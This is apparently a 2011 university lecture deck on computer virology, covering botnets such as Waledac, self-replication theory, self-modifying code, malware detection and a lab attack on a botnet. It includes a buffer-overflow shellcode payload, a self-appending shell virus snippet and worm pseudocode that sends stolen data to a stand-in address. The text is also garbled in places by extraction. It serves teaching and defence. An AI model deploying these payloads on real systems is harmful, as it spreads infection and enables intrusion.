An introduction to Computer Virology - Jean-Yves Marion LORIA

Page created by Jerome Hanson
 
CONTINUE READING
An introduction to Computer Virology - Jean-Yves Marion LORIA
An introduction to Computer Virology
      Jean-Yves Marion
      LORIA
      Université de Nancy

      Jean-Yves.Marion@loria.fr

mardi 20 décembre 2011                       1
An introduction to Computer Virology - Jean-Yves Marion LORIA
Some great stories !?
                                Stuxnet
            Waledac

                              GhostNet
mardi 20 décembre 2011                    2
An introduction to Computer Virology - Jean-Yves Marion LORIA
What is a malware ?

      • A malware is a program which has malicious intentions

      • A malware is a virus, a worm, a spyware, a botnet ...

      • Giving a mathematical definition is difficult

      ✴ So how it works ?

mardi 20 décembre 2011                                          3
An introduction to Computer Virology - Jean-Yves Marion LORIA
How do infections by malware work ?
       You can’t patch stupidity
                      Infections
      Social engineering

                                            Mutations

                         Infections
      Vulnerabilities
      Bugs are un-avoidable
mardi 20 décembre 2011                                  4
An introduction to Computer Virology - Jean-Yves Marion LORIA
A case Study : Waledac

      • Waledac is a botnet

      • The goal is to send spams

mardi 20 décembre 2011              5
An introduction to Computer Virology - Jean-Yves Marion LORIA
and other similar sexual-enhancement drugs. However, there are times when WALEDAC
    spews out spam that are neither pharmaceutical in nature nor carry other malware. This
    suggests that it may have been hired by third parties or clients as a spamming service.
    These regular WALEDAC spam are also documented in detail in Appendix B.
      Social       engineering
    The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far.

   INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS:
CTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,
               AND FAST-FLUXING NETWORKS

IX A

AC Social Engineering Tactics
                                                                                     INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS:
 e this report was written, WALEDAC was seen to have used eight social        EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,
                                                                                                 AND FAST-FLUXING NETWORKS
g attacks in an effort to make would-be victims run the malware. WALEDAC
 with the Christmas Ecard ploy.

                                                                           With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC
                                                                           started sending out spam for its new campaign. The email campaign then carried the bad
                                                                           news that “Obama refused to be the next president.”

                   Figure 1. Christmas ecard spam

                                                                               Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president
                                                         Figure 2. Timeline of WALEDAC activities

                                                                                                 Figure 6. WALEDAC rips text off from Obama’s website,
                  Figure 2. Christmas ecard website                                           bearing false news that he no longer wants to be the president
  mardi 20 décembre 2011                                                                                                                                                    6
An introduction to Computer Virology - Jean-Yves Marion LORIA
Waledac

      • Use of a dropper

            • Confickers or other malware are used to install waledac

      • Binaries are packed with UPX and homemade packers

      • Encryption technologies : RSA & AES (openSSL)

      • Send emails from templates

      • Scan files to find email addresses and password

      • Download binaries and update itself

mardi 20 décembre 2011                                                  7
An introduction to Computer Virology - Jean-Yves Marion LORIA
An email template

                          Received:	
  from	
  %^C0%^P%^R3-­‐6^
                          %:qwertyuiopasdfghjklzxcvbnm^%^%
                          ([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%])	
  

                         by	
  %^A^%	
  
                         with	
  Microsoft	
  SMTPSVC(%^Fsvcver^%);	
  %^D^%	
  
                         From:	
  "%^Fmynames^%	
  %^Fsurnames^%"	
  	
  
                         User-­‐Agent:	
  Thunderbird	
  %^Ftrunver^%	
  
                         To:	
  %^0^%	
  
                         Subject:	
  %^Fjuly^%	
  

                         http://%^P%^R26^%:qwertyuiopasdfghjklzxcvbnmeuioa^%.
                           %^Fjuly_link^%/^%

mardi 20 décembre 2011                                                                         8
An introduction to Computer Virology - Jean-Yves Marion LORIA
Packer codes

               Two different versions obtained after a few hours
mardi 20 décembre 2011                                             9
An introduction to Computer Virology - Jean-Yves Marion LORIA
3-tier movie of an attack

             social engineering
              targeted attack

                                                               a dropper

                            client-side exploit

                                                  Install malware

mardi 20 décembre 2011                                                     10
Software bugs

mardi 20 décembre 2011   11
Software Bugs (client side exploit)

      • Data are programs

      • Bugs are doors if there are exploitable (0-days)

      • A no bug system is safe

      • But systems contain bugs ... and bug-free programs do not exist as a
          consequence of the undecidability of the halting problem (Turing)

mardi 20 décembre 2011                                                         12
Vulnerabilities : a buffer-overflow

                                                                                                       EIP \xFFF0
       void vulnerable(char *user_data) {
         char buffer[4];
         strcpy(buffer, userdata);
                                                                                                      EBP \xE000
                                                                                                               \x90\x90
       }
                                                                                                       ...

   vulenrable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf
                                                                                                       ...     \x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
                                                                                                       ...     \x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

                                                                                                      buffer
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
   \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e
   \x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
   \x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)                                      Stack

mardi 20 décembre 2011                                                                                                    13
Vulnerabilities : a buffer-overflow

                                             EIP \xFFF0
       void vulnerable(char *user_data) {
         char buffer[4];
         strcpy(buffer, userdata);
                                            EBP \xE000
                                                     \x90\x90
       }
                                             ...
                                             ...     \x90\x90
                                             ...     \x90\x90
     return at the address FFF0
                                            buffer

                                            Stack

mardi 20 décembre 2011                                          14
Bugs
             • A buffer-overflow transforms a program in a self-modifying program

                         Wave 1                           Wave 1

                                                          Wave 2

                                             Wave 2 is the code created
                                             by buffer overflow in wave 1
mardi 20 décembre 2011                                                              15
cer ? (1/3)
       What is a malware ?
nalyse   binaire,    c’est
    • Infect systems by self-replication
de programme
             • Mutation
mme est inconnu
e un• Protect
      blob itself
              binaire
             • Obfuscation
ts
     • Self-modification
 contrôle indécidable
tures indirectes
   • Detection
 données indécidable
             • Undecidable
odifiant
e indécidable
 mardi 20 décembre 2011                    16
Outline

      • Foundation 1 : Self-replication

      • Foundation 2 : Self-modification

      • Detection

            • Detection by string matching

            • Behavioral detection

            • Botnet neutralization

mardi 20 décembre 2011                       17
Foundation 1 : Self-Replication

mardi 20 décembre 2011                  18
Self-replicating Cellular automaton

        Von Neumann (1952), Burke

                                       Codd, Langton

mardi 20 décembre 2011                                 19
Cohen’s formalization (1985)
           Cohen’s Virus (1985)                                                   Re
                                                                               theor
                                                                                foun
                                                                              compu

                          v1 v2 ... vn                    v’1 v’2 ... v’m
                                                                              Viruses
                                                                              worms

                                                                              ILoveYo

                                                                              State o

                                                                              A more
                   �     Consider Turing Machine M                            approa

                   �     and a Viral set V                                    Abst Vi

                                                                              Weak r
                   �     When a TM M reads v ∈ V , M produces       v�   ∈V   Blueprint

                                                                              Strong
                   �     (M, V ) is a description of a virus                  External p

                                                                              Extend
                                                                              recursio
                                                                              fixed poly

                                                                              Explicit
                                                                              Internal p
                                                                              Reproduc
mardi 20 décembre 2011                                                        vectors
                                                                                   20
Self-Replication
      • A virus has self-replicating capacity

      • Reflexive property of programming language based on a

            • Pointer mechanism to program code, e.g. $0
                           # f o r each f i l e FName i n t h e c u r r e n t p a t h
                           f o r FName in ∗ ; do
                            # i f FName i s not me
                             i f [ $FName != $0 ] ; then
                            # add m y s e l f a t t h e end o f FName
                             cat $0 >> $FName
                             fi
                           done

                                                Figure 2: An example of ecto-symbiote

                           We see that by iterating this virus, it will make copies of itself
                           system runs out of memory.
mardi 20 décembre 2011                                                                    21
Self-Replication

            • Program encoding
              (Ken Thompson «Reflections on trusting Trust», CACM84)

                    main() { char *s="main() { char *s=%c%s %c;
                    printf(s,34,s,34); }"; printf(s,34,s,34);}

            • See also quines

mardi 20 décembre 2011                                                 22
Self-Replication
            • Fixed point combinators (functional programming languages)

                                    Y F = Y (Y F )

            • Computability : Recursion theorem of Kleene (1938)
                  • See book of N.D Jones for a programming point of view
                  • See books of Rogers or P. Odifreddi for a computability point of view
                  • See marvelous books of R. Smullyan ...

mardi 20 décembre 2011                                                                      23
A compilation point of view

                               A worm X scenario

      •Open an email attachment by social engineering

      •X scans for informations

      •X extracts a list of email address of targeted peoples

      •X sends copy of itself by email

mardi 20 décembre 2011                                          24
Worm X specification
         WormX(v,out)
         { info := extract(out);    extract information
           send(«badguy»,info);     send information
           @bk := findAddress(out);    find email address
           send(@bk,v);          send worm X to @bk
         }

                         How to compile Worm X ?

mardi 20 décembre 2011                                      25
Program Semantics
        Semantics

               �P �(d) is the value of P on the environment d
                                                  ∗          ∗
                                 �_� : Programs × D → D
                where a value of D∗ is a system environment.
                From the above example
                                                   ��        ��
                            �send�(spider@man.com, Hello , Out)
                                                        ��        ��
                         = cons(cons(spider@man.com, Hello ), Out)

                Where Out is an output stream.

mardi 20 décembre 2011                                                 26
Suppose that out is a system entry point,
         A specification of ILoveYou is:
       love(v,out) {
      Solve a fixed point equation
         info := find(out); // find informations
         out := send(cons(‘‘badguy@dom.com’’,nil),info);
         @bk := extract(out); //extract addresses
         out := send(@bk,v); //send virus to @bk
         return out;
       }
        We have to solve a fixed point equation :
         v should behave as ILoveYou if:

                         !W "(out) = !WormX"(W, out)

       W is a worm satisfying the specification WormX

mardi 20 décembre 2011                                     27
A general solution to fixed point equations is given by
      Kleene’s recursion theorem
         Theorem (Kleene (1938))
      IfIfppisis aa program,
                    program,   then
                             then    there
                                  there      is a program
                                        is a program e such e
                                                            that
      such that:
                                   !e"(x) = !p"(e, x)

     Proof:
      A solution�d(x)�(y)
                 of IloveYou equation
                          = �x�(x, y)
                         �q�(y, x) = �p�(�d�(y),
                                 !v"(out)        x) out)
                                          = !love"(v,

         Set v = ee =
                    where
                      d(q) p = Love.
         �d(q)�(x) = �q�(q, x)                    �d�(q) = �p�(�d�(q), x)

mardi 20 décembre 2011                                                      28
fou
     Suppose that out is a system entry point,                              comp
     A specification of ILoveYou is:
      Malware
        A general solution to fixedfrom
     love(v,out)       construction
                        {
                                        point a  specification
                                              equations  is given by
       info := find(out); // find informations
     Kleene
        Theorem
       out          recursion
                        (Kleene theorem:
                                 (1938))
             := send(cons(‘‘badguy@dom.com’’,nil),info);
     If@bk
        Ifppisis:=aaextract(out);
                    program,    then
                     program, then     there
                                   //extract
                                    there    a is a program
                                          is addresses
                                               program  e such ethat
                                                                  such   that:
       out := send(@bk,v); //send virus to @bk
       return out;               !e"(x) = !p"(e, x)
     }
      A solution of IloveYou equation
     v should behave as ILoveYou if:
       Kleene fixed point is a solution of
                            !v"(out) = !love"(v, out)
                         !W "(out) = !WormX"(W, out)
         Set v = e where p = Love.
      We can construct a virus, which satisfies a given
      specification.

mardi 20 décembre 2011                                                       29
approa
     out := send(@bk,v); //send virus to @bk                 Abst Vi
     return out;                                             Weak r
   } Self-replicating         malware compiler               Blueprint

                                                             Strong
                                                             External p

   v should behave as ILoveYou if:
               There is a compiler Comp such that W is the
                                                             Extend
                                                             recursio

               worm satisfying
                       !W "(out) the specification
                                              out) Worm:     fixed poly
                                 = !WormX"(W,
                                                             Explicit
                                                             Internal p
                                                             Reproduc
                                                             vectors

                                                             Detecti
                         !Comp"(Worm) = W
                                                             Conclu
                             !W"(out) = !Worm"(W, out)

mardi 20 décembre 2011                                            30
Self-replication with mutations
                                                                   Recursion
  Wehistorical
Some can generate
                factsmalware which satisfies the                theorems as a
                                                                 foundation of

  specification Worm, and mutates at each                     computer virolo

  execution automatically                                     Viruses and
                                                              worms

                                                              ILoveYou
                         !e"(out) = !Worm"(Mutate(e), out)    State of the art

                                                              A more abstract
     where
     !1983 :Mutate    is a code
            the first official       mutation
                               virus pn Vax-PDPprocedure
                                                11
                                                              approach

                                                              Abst Virology
     !    1988 : The first worm which infects 6000 machines   Weak recursion
                                                              Blueprint Distributions
     !
        The construction of e is given by Kleene’s
         1990 :Dark Avenger mutation engine (Bulgaria)        Strong recursion

        theorem.
         1995 : macro virus                                   External polymorphism
     !
                                                              Extended
     !    2000 : Worm “I Love You”                            recursion
                                                              fixed polymorphism

     !    2001 : Palm pilot virus                             Explicit recursio
                                                              Internal polymorphism
mardi 20 décembre 2011                                                          31
Self-replicating
          historicalcompiler
                     facts with mutations:                               Recurs
   Some                                                               theorem
                                                                       foundati
                                                                    computer v

         There is a compiler Comp such that for all
         worm specification    Worm and mutation
                 !e"(out) = !Worm"(Mutate(e), out)                  Viruses and
                                                                    worms

         procedure Mutate :                                         ILoveYou

                                                                    State of the

                                                                    A more abs
                         !Comp"(Worm) = W                           approach

                             !W"(out) = !Worm"(Mutate(W), out)      Abst Virolo

                                                                    Weak recu
                                                                    Blueprint Distrib

           !    1983 : the first official virus pn Vax-PDP 11       Strong recu
                                                                    External polymo

           !    1988 : The first worm which infects 6000 machines   Extended
                                                                    recursion
           !    1990 :Dark Avenger mutation engine (Bulgaria)       fixed polymorph

                                                                    Explicit rec
           !    1995 : macro virus                                  Internal polymo
                                                                    Reproduction th
           !    2000 : Worm “I Love You”                            vectors

                                                                    Detection
           !    2001 : Palm pilot virus
mardi 20 décembre 2011                                                         32
References
      • PhD thesis of F. Cohen
      • L. Adleman (1988) which coins the word «virus»
      • Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract
        Computer Virology from a Recursion Theoretic Perspective.
        Journal in Computer Virology (3-4): 45-54 (2006)

                                                         A Virus is a Virus,
                                                               Lwoff
mardi 20 décembre 2011                                                          33
Foundation 2 : Self-modifications

mardi 20 décembre 2011                    34
A data is a code

      Today’s computers are built from two key
      principles:
      1) Instructions are represented as numbers
      2) Programs can be stored in memory to be read
      or written just as numbers
                                (Patterson & Hennessy)

mardi 20 décembre 2011                                   35
Applications of self-modifying programs

      • Malware mutations

      • Code protection (digital rights)

      • Compression and packers

      • Just in Time compilers

mardi 20 décembre 2011                          36
A simple self-modifications

        A simple decryption loop

                          Wave 1       {@a,@b,@c,@d}

                              jnz @b

                          Wave 2         {@offset}

mardi 20 décembre 2011                                 37
Ex: Packer UPX

                         UPX (Packer)
                          Hello.exe
                                        Wave 1

                                        Wave 2

mardi 20 décembre 2011                           38
Another example of self-modification

        Proxy =
         { X:= Read();
           eval(X);}                     An external input is run

                   An interpreter of a known or unknown
                   language is used to execute some data

mardi 20 décembre 2011                                              39
Analyzing self-modifying programs

      • Complex to design and to analyze

      • Program flow may change

                Some historical facts
      • Usual in semantics program and data are separated
                                                                        c
                                                        !
        Define by structural induction on P :   P!σ→σ
                                                                       V
                                                                       w

                                                                       IL
                               !e"(out) = !Worm"(Mutate(e), out)       S

                                                                       A
                                                                       a

                                                                       A
                         !Comp"(Worm) = W
                                                                       W
                                 !W"(out) = !Worm"(Mutate(W), out)
mardi 20 décembre 2011                                               40 S
Dynamic analysis of self-modifying programs

      • Instrument a program

      • Monitor read R, write W memory access and memory execution X

            • We follow nested self-modifying

            • We detect some code protection

            • We detect code patterns

                  • code decryption

                  • Integrity checking

                  • ....

mardi 20 décembre 2011                                                 41
Exemple (3/5)
      AC Protect
         •               hostname packé avec ACProtect
                                                                
                                                                

                                                            
                                                             

                                                   
                                                     

                                                                      
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                       

                                                                     
                                                                      

                                                                         
                                                                          

                                                              
                                                                

mardi 20 décembre 2011                                                             42
Exemple
      Themida  (4/5)
          • hostname packé avec Themida

                                                                   
                                                                     

                                                                   
                                                                     

                                                                                  
                                                                                     

                                  
                                    

                                                        
                                                        

                                                                               
                                                                                

                             
                                

                                                                              
                                                                                

                                                                                      
                                                                                      

                                                                                            
                                                                                              

mardi 20 décembre 2011                                                                                43
Experiments with TraceSufer
                Résultats expérimentaux 1/3
        TraceSurfer     based
           • Nombre de vagues      ondétectées
                              de code   Pin (Intel)
                                                 sur l’ensemble des binaires
                         ◦ max : 56 vagues

        95 613 Binaries, 80% of success, 1400 binaries/h

                  24 / 32

                    Number of waves detected - max=56
mardi 20 décembre 2011                                                         44
Related works

      • TraceSufer based on PIN (INTEL)

      • Bitblaze (Berkeley) : TEMU, VINE, ...

      • DynamoRio, Ether, Metasm

      • Data tainting related methods

mardi 20 décembre 2011                          45
Malware detection

mardi 20 décembre 2011    46
Malware detection by string scanning

      • Signature is a regular expression denoting a sequence of bytes

                                      Worm.Y
                         Your mac is now under our control !

      • Signature : «Your * is now under our control

                                      Worm.Y
                         Your PC is now under our control !

mardi 20 décembre 2011                                                   47
Malware detection by string scanning
______________________________________________________________________________________________________ VIRUS INFORMATIQUES

           • Signature is a regular expression denoting a sequence of bytes
           • Data base of known signatures
ode dynamique : l’antivirus est en fait résident et surveille
                                       Tableau 1 – M ot if viral de I-Worm .Bagle.P
 nence l’activité du systèm e d’exploitation, du réseau et
e l’utilisateur. Il prend la m ain avant toute action et tente                       Taille
m iner si un risque viral existe, lié à cette action. Ce m ode                                                 Signature
                                                                    Produit        signature
m and en ressources et nécessite des m achines relative-                                                        (indices)
                                                                                  (en octets)
ssantes pour ne pas être handicapant et pousser l’utilisa-
 rop souvent rencontré) à désactiver ce m ode au profit du           Avast             8                   12,916 → 12,919
 .                                                                                                         12,937 → 12,940
 ivirus m odernes, pour les plus efficaces, sont supposés             AVG           14,575               533 → 536 - 538 - ...
r plusieurs techniques (program m ées dans des m odules           Bit Defender       8,330          0 - 1 - 60 - 128 - 129 - 134 - ...
és m oteurs) afin de réduire le risque au m inim um . Elles
être classées en deux groupes :                                     Dr Web           6,169          0 - 1 - 60 - 128 - 129 - 134 - ...
alyse de forme, com m uném ent appelée recherche de                eTrust/Vet        1,284          0 - 1 - 60 - 128 - 129 - 134 - ...
 atures. Cette dernière appellation est en réalité im propre
elle ne considère qu’une approche très restreinte de l’ana-         eTrust/
                                                                                     1,284          0 - 1 - 60 - 128 - 129 - 134 - ...
  de form e, laquelle regroupe de nom breuses techniques.         Inoculate IT
 alyse de form e consiste à analyser un code vu com m e            F-Secure
  séquence de bits ou d’octets, hors de tout contexte                                 59            0 - 1 - 60 - 128 - 129 - 546 - ...
                      Worm.Bagle.P:
                                                                     2005
 écution. Cette analyse est fondée sur la notion de
  ma de détection ([9] chapitre 2) !" = { !# ,f # }, com posé       G-Data            54            0 - 1 - 60 - 128 - 129 - 546 - ...
   m otif de détection !# (relativem ent à un code m al-            KAV Pro           59         Identique à celle de F-Secure 2005
ant # ) et d’une fonction de détection f # . Il s’agit alors de
 ercher de différentes m anières (caractérisées par la fonc-        M cAfee
                                                                                   12,127 8         0 - 1 - 60 - 128 - 129 - 134 - ...
  de détection), relativem ent à une ou plusieurs bases              2006
 em ble de schém as de détection), des chaînes de bits ou           NOD 32          21,849       0 - 1 - 60 - 128 - 129 - 132 - 133 - ...
 tets !# , à la structure plus ou m oins com plexe, réperto-
s dans ces bases com m e caractéristiques d’un code m al-           Norton
                                                                                       6              0 - 1 - 60 - 128 - 129 - 134
ant donné # ;                                                        2005
alyse comportementale dans laquelle un fichier                     Panda Tit.
 utable est analysé dans son contexte d’exécution. Il                                7,579        0 - 1 - 60 - 134 - 148 - 182 - 209...
                                                                     2006
 t d’une détection fonctionnelle – ce sont les
m portem ents » ou les actions du code qui sont étudiées.           Sophos           8,436        0 - 1 - 60 - 128 - 129 - 134 - 148...
s ce contexte, la détection se fonde alors sur la notion de          Trend
 égie de détection [9].                                                               88               0 - 1 - 60 - 128 - 129 - ...
                                                                  Office Scan

 tion 5 : stratégie de détection
                                                                                                                                            Source : Filiol
tratégie de détection relativem ent à un code m alveillant           Exemple : considérons la détection d’un ver récent et connu
# est le triplet :                                                comme le ver Bagle.P. La liste des différents motifs de détection est
                                                                  donnée dans le tableau 1 . La fonction de détection est la fonction
               "! = { !
  mardi 20 décembre   2011                                        logique ET. Cela signifie que pour que le ver soit détecté, les octets                      48
                       # , $# ,f # }
Malware detection by string scanning
          Pros :
         • Accuracy: low rate of false positive
            ➡ programs which are not malware are not detected

         • Efficient : Fast string matching algorithm
            ➡ Karp & Rabin, Knuth, Morris & Pratt, Boyer & Moore

         Cons :
      • Signature are quasi-manually constructed

      • Vulnerable to malware protections
          ➡ Mutations

          ➡ Code obfuscations

mardi 20 décembre 2011                                             49
Detection by integrity check

      • Identify a file using a hash function

                  Files     Hash function           Hash numbers

                                                          a
                                                                   numerical
                                                                  fingerprints

                                                          b

      • Cons :
        • File systems are updated, so numerical fingerprints change
        • Difficult to main in practice
        • Files may change with the same numerical fingerprint (due to hash fct)

mardi 20 décembre 2011                                                             50
Behavioral    analysis
            Trace automata

 Introduction               • Trace language of a program: generally undecidable.
          • Monitor program interactions (sys calls, network calls, ...)
 Trace abstraction
 • Behavior patterns        • Approximation by a regular language: using trace collection
 • Abstracting by
 reduction                    or static analysis.
          • Detection of program behavior from execution traces
 • Trace automata
 • Regular abstraction
 Malicious behavior      =⇒ A trace automaton is a finite state approximation of some trace
 detection
                   language.
          • Functionalities
 Experiments                 are expressed at high level
 Conclusion

                          IcmpSendEcho              GetDriveType       FindFirstFile     FindNextFile

                                  GetLogicalDriveStrings    GetDriveType        FindFirstFile

                                                             FindFirstFile      FindNextFile
                                                                      FindNextFile

          • Information leak can be detected
          • Cons :
            • Today behavioral analysis is dynamic, which implies 12to/ 22monitor all
              processes, or run programs in sandboxes.
            • It slows down the system

mardi 20 décembre 2011                                                                                  51
Code protection

      Detection is hard because malware are protected

      1.Obfuscation

      2.Cryptography

      3.Self-modification

      4.Anti-analysis tricks

mardi 20 décembre 2011                                  52
Protections: Self-Modification and Obfuscation
                         !"#$%&'(#)($*+,
      • A lot of malware families use home-made obfuscations, like packers to
        protect their binaries, following a standard model.
‡ - .&( &/ 01.213# /104.4#5 65# "&0#7018#
  91:;#35        (& mechanism
   • The obfuscation  93&(#:( is("#43    
                                               modified for each new 1
     distributed binary.
  5(1'8138 0&8#.? EF
                              D'91:;4'>$   CEF   C34>4'1.
                                :&8#
!"#$%&'()*(+'#,-.(/0(1-0#"'2.3#-
      Win32.Swizzor Packer
                          džĂŵƉůĞ͗tŝŶϯϮ͘^ǁŝnjnjŽƌ͛ƐƉĂĐŬĞƌ

                         5"36#,7*(8&9&":&;&-?&":(0#"(@,''3&:(; A&&6B&> )C4C(   44

mardi 20 décembre 2011                                                                                      54
Protections: Self-Modification and Obfuscation
                          !"#$%&'(#)($*+,
      • A lot of malware families use home-made obfuscations, like packers to
        protect their binaries, following a standard model.
‡ - .&( &/ 01.213# /104.4#5 65# "&0#7018#
  91:;#35        (& mechanism
   • The obfuscation  93&(#:( is("#43    
                                               modified for each new 1
     distributed binary.
  5(1'8138 0&8#.? EF
                               D'91:;4'>$   CEF   C34>4'1.
                                 :&8#
Code protection

      Detection is hard because malware are protected.

      Some interesting protection methods:

      1.Obfuscation

      2.Cryptography

      3.Self-modification

      4.Anti-analysis tricks

mardi 20 décembre 2011                                   56
Obfuscation
      • Function calls
                       !"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5(
                                63789:&;&%(+$,
!"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5(
      Obfuscation
                         63789:&;&%(+$,
Code protection

      1.Obfuscation

      2.Cryptography

      3.Self-modification

      4.Anti-analysis tricks

mardi 20 décembre 2011         59
Cryptography

      • The dropper of Agobot botnet

mardi 20 décembre 2011                 60
mardi 20 décembre 2011   61
http://quequero.org/AgoBot_Botnet_Reverse_Engineering

mardi 20 décembre 2011                                                           62
Code protection

      1.Obfuscation

      2.Cryptography

      3.Self-modification

      4.Anti-analysis tricks

mardi 20 décembre 2011         63
Self-modification

      • Packers ... already seen   previously ...

mardi 20 décembre 2011                              64
Code protection

      1.Obfuscation

      2.Cryptography

      3.Self-modification

      4.Anti-analysis tricks

mardi 20 décembre 2011         65
Anti-debuging tricks

                                 MOV EAX,-1

                                 INT 2E

                                 CMP WORD PTR DS:[EDX-2],2ECD

      • Call interruption 2E with an invalid EAX value

      • Normal behavior : EDX contains the address of the next instruction

      • Test if EDX-2 points to the opcode of INT 2E, which is 2ECD

      • If a debugger is running, then EDX is equal to 0xFFFFFFFF

mardi 20 décembre 2011                                                       66
Consequences of Code protection

      1. Difficult for a human analyst to understand a malware code

            1. Ollydbg

            2.IDA Pro

mardi 20 décembre 2011                                                67
Welcome in Swizzorland !!

                                  !

mardi 20 décembre 2011                68
Consequences of Code protection

      1. Difficult for a human analyst to understand a malware code

            1. Ollydbg

            2.IDA Pro

      2.Difficult to design automatic tools

            1.Static analysis

                  • Abstract interpretation

            2.Dynamic analysis

mardi 20 décembre 2011                                                69
mardi 20 décembre 2011   70
A cruel world

          Theorem : Let v be a virus. The set of viruses which are obtained from v by
          mutation is not decidable (computable).

        A consequence of Rice theorem

          Theorem (RICE): Let P be a non-trivial computable property.
          Then the set of programs which satisfies P is not decidable.

        Idea of the proof : Construct a reduction from the halting problem.

mardi 20 décembre 2011                                                                  71
Morphological analysis in a nutshell

            Signatures are abstract
                  flow graph

               Detection of subgraph in program flow graph
                               abstraction
mardi 20 décembre 2011                                       72
Automatic construction of signatures

mardi 20 décembre 2011                       73
Reduction of signatures by graph rewriting

mardi 20 décembre 2011                             74
Morphological detection : Results

      • False negative

            • No experiment on unknown malware

            • Signatures with < 18 nodes are potential false negative

            • Restricted signatures of 20 nodes are efficient

      • Less than 3 sec. for signatures of 500 nodes

mardi 20 décembre 2011                                                  75
Conclusion about morphological detection

      • Benchmarks are good

      • Pro

            • More robust on local mutation and obfuscation

            • Detect easily variants of the same malware family

            • Try to take into account program semantics

            • Quasi-automatic generation of signatures

      • Cons

            • Difficult to determine flow graph statically of self-modifying programs

            • Use of combination of static and dynamic analysis

mardi 20 décembre 2011                                                                  76
Reference

        • Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware
          morphological detector, Journal in Computer Virology, Springer 2008.

mardi 20 décembre 2011                                                                             77
Waledac, again ....

      • How to neutralize a botnet ?

      • Send the US-Marshals (see Rustock recent story)

      • Design an attack

            • Good understanding of the mechanisms of a botnet (reverse engineering)

            • Find an attack

            • Large scale experiments in vitro

mardi 20 décembre 2011                                                                 78
Waledac Peer-to-peer communication protocol

      • Each peer maintains a list of known peer (RLIST)

      • Bots exchange parts of their RLIST on regular basis to maintain connectivity

      • Fallback mechanism over HTT¨to fetch new peers

     Sorted by local time                                              Global timestamp
                         
                         1244053204

                                                                                          Id Repeater 1
                         
                         	
  691775154c03424d9f12c17fdf4b640b
                         
                         ...
                         
                                                                         local timestamp
mardi 20 décembre 2011                                                                                                 79
Waledac Peer-to-peer communication protocol

      • Update are based on the most recent timestamps

      • IP address does not identify a peer

      • The id identifies a peer
                                              0
                                              
      • Vulnerability to sibyl attack         
                                              00000000000000000000000000000001
                                              
      • Craft a RLIST update to put           ...
        «myIP» on the top-500 list            
                                              00000000000000000000000000000500
                                              
mardi 20 décembre 2011                                                                        80
Botnet neutralization in the lab
                                             Attack scenario!

                         4!2(5$'%$5(*!               !
                                                "!#$$#%&'(!
                                                     !
                         011!('2'#$'(*
                          !""#$%&%'(%$)# !

                                                    )!
                                                  *+,-.*!
                         /011!*2#33'(*!             !
                                                            WHITE C&C!
                                !

                                                                 13!
mardi 20 décembre 2011                                                 81
A sybil attack

mardi 20 décembre 2011   82
Spam sent by the botnet

mardi 20 décembre 2011          83
Rlist infections for repeaters

mardi 20 décembre 2011                 84
High Security Lab @ Nancy

                                   lhs.loria.fr

    Telescope & honeypots
    In vitro experiment clusters

mardi 20 décembre 2011                            85
Conclusions

mardi 20 décembre 2011   86
Conclusion

      • Mathematical definitions of malware with tools

            • High level representation of binaries

            • Abstract signature which are robust w.r.t. obfuscations

      • Experiments theories

            • Analyzing tools combining static and dynamic analysis

            • Detection and neutralization heuristics

mardi 20 décembre 2011                                                  87
Thanks !

mardi 20 décembre 2011   88
You can also read